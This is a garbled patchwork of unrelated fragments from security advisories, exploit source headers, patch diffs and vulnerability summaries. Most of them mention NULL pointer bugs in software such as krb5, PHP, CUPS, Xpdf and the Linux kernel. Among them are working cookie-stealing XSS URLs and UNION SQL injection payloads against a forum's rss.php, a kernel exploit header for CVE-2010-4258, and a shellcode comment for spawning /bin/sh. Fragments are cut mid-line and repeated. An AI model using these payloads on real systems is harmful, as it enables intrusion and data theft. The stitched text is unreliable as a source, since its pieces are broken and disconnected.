char *db=thd->strdup(packet), *alias;
HA_CREATE_INFO create_info;
statistic_increment(thd->status_var.com_stat[SQLCOM_CREATE_DB],
&LOCK_status);
// null test to handle EOM
if (!db || !(alias= thd->strdup(db)) || check_db_name(db))
{
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
}
char *oldplace = in->data;
@@ -390,6 +409,13 @@ static svn_error_t *
/* First thing in the string is the original length. */
in->data = (char *)decode_size(&len, (unsigned char *)in->data,
(unsigned char *)in->data+in->len);
+ if (in->data == NULL)
+ return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL,
+ _("Decompression of svndiff data failed:
no size"));
+ if (len > limit)
+ return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL,
(GPC) input. An example of the mechanism is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
PAGE_SIZE."==0)", NULL),
> (GPC) input. An example of the mechanism is the following:
>
> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
>
> $fields=array(
> "config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
> // actions
> "groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
> PAGE_SIZE."==0)", NULL),
http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
SQL Injection
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
=========
Solution
"`contact_admin` , `contact_type_msg`, `contact_activate`,
`contact_auth_type`, " . "`contact_ldap_dn`, `contact_location`,
`contact_address1`, `contact_address2`, " . "`contact_address3`,
`contact_address4`, `contact_address5`, `contact_address6`)" .
"VALUES ( ";
$rq .= "NULL, "; isset($ret["timeperiod_tp_id"]) && $ret["timeperiod_tp_id"]
!= NULL ? $rq .= "'".$ret["timeperiod_tp_id"]."', ": $rq .= "NULL, ";
isset($ret["timeperiod_tp_id2"]) && $ret["timeperiod_tp_id2"] != NULL ? $rq
.= "'".$ret["timeperiod_tp_id2"]."', ": $rq .= "NULL, ";
isset($ret["contact_name"]) && $ret["contact_name"] != NULL ? $rq .=
"'".htmlentities($ret["contact_name"], ENT_QUOTES, "UTF-8")."', ": $rq .=
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
> * discovered by Nelson Elhage:
> *
> * CVE-2010-4258
> * -------------
> * This is the interesting one, and the reason I wrote this exploit. If a
> * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
> * word will be written to a user-specified pointer when that thread exits.
> * This write is done using put_user(), which ensures the provided destination
> * resides in valid userspace by invoking access_ok(). However, Nelson
> * discovered that when the kernel performs an address limit override via
> * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
Name: Xpdf - Integer overflow which causes heap overflow and NULL pointer dereference
Author: Adam Zabrocki / HISPASEC (<pi3@itsec.pl> or <adam@hispasec.com>)
Date: July 06, 2009
Issue:
Xpdf allows local and remote attackers to overflow a heap buffer via an integer overflow vulnerability.
Xpdf is prone to NULL pointer dereference attack.
if(tout > 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
}
if(socket < 0) return NULL;
if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
while (1) {
Versions: <= 0.1.15
Platforms: *nix
Bugs: A] first buffer-overflow in RTSP_valid_response_msg
B] second buffer-overflow in RTSP_valid_response_msg
C] crash in RTSP_remove_msg
D] NULL pointer in parse_transport_header
E] NULL pointer in parse_play_time_range
F] NULL pointer in log_user_agent
G] NULL pointer in Netembryo 0.0.4
Exploitation: remote
Date: 27 Dec 2007
}
catch(AxisFault axisfault)
{
axisfault.printStackTrace();
}
return null;
}
..
the decompiled WebServiceClient.class :
memory corruption resulting from a resource liberation bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
The other two vulnerabilities lead to abnormal termination (crash) of
the iCal application due to null-pointer dereference bugs triggered
while parsing a malformed '.ics' file. The ability to inject and
execute arbitrary code on vulnerable systems using these two
vulnerabilities was researched but not proven possible.
Exploitation of these vulnerabilities in a client-side attack scenario
memory corruption resulting from a resource liberation bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
The other two vulnerabilities lead to abnormal termination (crash) of
the iCal application due to null-pointer dereference bugs triggered
while parsing a malformed '.ics' file. The ability to inject and
execute arbitrary code on vulnerable systems using these two
vulnerabilities was researched but not proven possible.
Exploitation of these vulnerabilities in a client-side attack scenario
static void exec_passwd(void)
{
int tty, pid;
switch ((pid = forkpty(&tty, NULL, NULL, NULL))) {
case -1:
pexit("forkpty");
case 0:
execl("/usr/bin/passwd", "passwd", NULL);
Original release: 2011-10-18
Last update: 2011-10-18
Topic: KDC denial of service vulnerabilities
CVE-2011-1527: null pointer dereference in KDC LDAP back end
CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C
CVSSv2 Base Score: 7.8
@@ -1232,6 +1239,10 @@
STD_PHP_INI_ENTRY("fastcgi.impersonate", "0", PHP_INI_SYSTEM, OnUpdateBool, impersonate, php_cgi_globals_struct, php_cgi_globals)
# endif
#endif
+#ifdef HAVE_PWD_H
+ STD_PHP_INI_ENTRY("cgi.suexec_base_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_base_dir, php_cgi_globals_struct, php_cgi_globals)
+ STD_PHP_INI_ENTRY("cgi.suexec_user_dir", NULL, PHP_INI_SYSTEM, OnUpdateString, suexec_user_dir, php_cgi_globals_struct, php_cgi_globals)
+#endif
PHP_INI_END()
/* {{{ php_cgi_globals_ctor
PVOID * ppfn;
pmz = (PIMAGE_DOS_HEADER)
((UINT_PTR)hmMSHTML & ~(UINT_PTR)0xFFFFU);
if (pmz->e_magic != IMAGE_DOS_SIGNATURE || pmz->e_lfanew <= 0)
return NULL;
ppe = (PIMAGE_NT_HEADERS32)
((LONG_PTR)pmz + pmz->e_lfanew);
if ( ppe->Signature != IMAGE_NT_SIGNATURE ||
ppe->FileHeader.Machine != IMAGE_FILE_MACHINE_I386 ||
unsigned int token_handle;
int ret;
/* Ask for permission like a debugger */
new_token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValueA ( NULL, SE_DEBUG_NAME,
&new_token_privileges.Privileges[0].Luid );
/* Open token */
//OpenProcessToken ( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
(void*) &token_handle );
[ PHP 5.3.6 multiple null pointer dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- Dis.: 20.07.2011
- Pub.: 19.08.2011
Original link:
http://cxsecurity.com/research/103
[--- 1. Multiple NULL Pointer Dereference with zend_strndup() [CVE-2011-4153] ---]
As we can see in zend_strndup()
-zend_alloca.c---
ZEND_API char *zend_strndup(const char *s, uint length)
{
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
1. *Advisory Information*
http://www.lfs.net
Versions: <= 0.5X10
Platforms: Windows
Bugs: A] nickname buffer-overflow
B] partial track buffer-overflow
C] NULL pointer access in internet/hidden S1/S2 servers
D] memcpy() NULL pointer in internet/hidden S1/S2 servers
Exploitation: remote, versus server
A] demo/S1/S2 in-game
B] demo/S1/S2 in-game
C] S1/S2 (internet/hidden)
uint32_t typedef u32;
#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */
/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
MITKRB5-SA-2010-005
MIT krb5 Security Advisory 2010-005
Original release: 2010-05-18
Topic: GSS-API library null pointer dereference
CVE-2010-1321
CVSSv2 Vector: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C
va_start(ap, format);
lc = localeconv();
dst = s;
fmt = format;
asciivalue = NULL;
currency_symbol = NULL;
pad_size = 0;
while (*fmt) {
/* pass nonformating characters AS IS */
node that is not part of the kernel node set. (CVE-2010-0415)
The ATI Rage 128 (aka r128) driver in the Linux kernel before
2.6.31-git11 does not properly verify Concurrent Command Engine (CCE)
state initialization, which allows local users to cause a denial of
service (NULL pointer dereference and system crash) or possibly gain
privileges via unspecified ioctl calls. (CVE-2009-3620)
The wake_futex_pi function in kernel/futex.c in the Linux kernel
before 2.6.33-rc7 does not properly handle certain unlock operations
for a Priority Inheritance (PI) futex, which allows local users to
node that is not part of the kernel node set. (CVE-2010-0415)
The ATI Rage 128 (aka r128) driver in the Linux kernel before
2.6.31-git11 does not properly verify Concurrent Command Engine (CCE)
state initialization, which allows local users to cause a denial of
service (NULL pointer dereference and system crash) or possibly gain
privileges via unspecified ioctl calls. (CVE-2009-3620)
The wake_futex_pi function in kernel/futex.c in the Linux kernel
before 2.6.33-rc7 does not properly handle certain unlock operations
for a Priority Inheritance (PI) futex, which allows local users to